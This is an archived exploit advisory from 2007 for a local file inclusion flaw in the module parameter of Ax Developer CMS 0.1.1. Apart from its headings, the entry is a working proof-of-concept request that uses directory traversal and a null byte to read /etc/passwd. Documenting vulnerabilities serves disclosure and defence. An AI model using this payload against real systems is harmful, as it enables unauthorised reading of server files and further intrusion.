id: 2266
date: 11/02/2007
title: Ax Developer CMS 0.1.1 (index.php module) Local File Inclusion Vuln
author: GoLd_M
cves: 

===================================================================
Ax Developer CMS 0.1.1 (index.php module) Local File Inclusion Vuln
===================================================================


#################################################################################
# Ax Developer CMS 0.1.1 (index.php module) Local File Inclusion Vulnerability  #
# http://sourceforge.net/projects/axdcms/                                       #
# POC :                                                                         #
# /index.php?module=../../../../../../../../etc/passwd%00                       #
#################################################################################



#  0day.today [2023-03-26]  #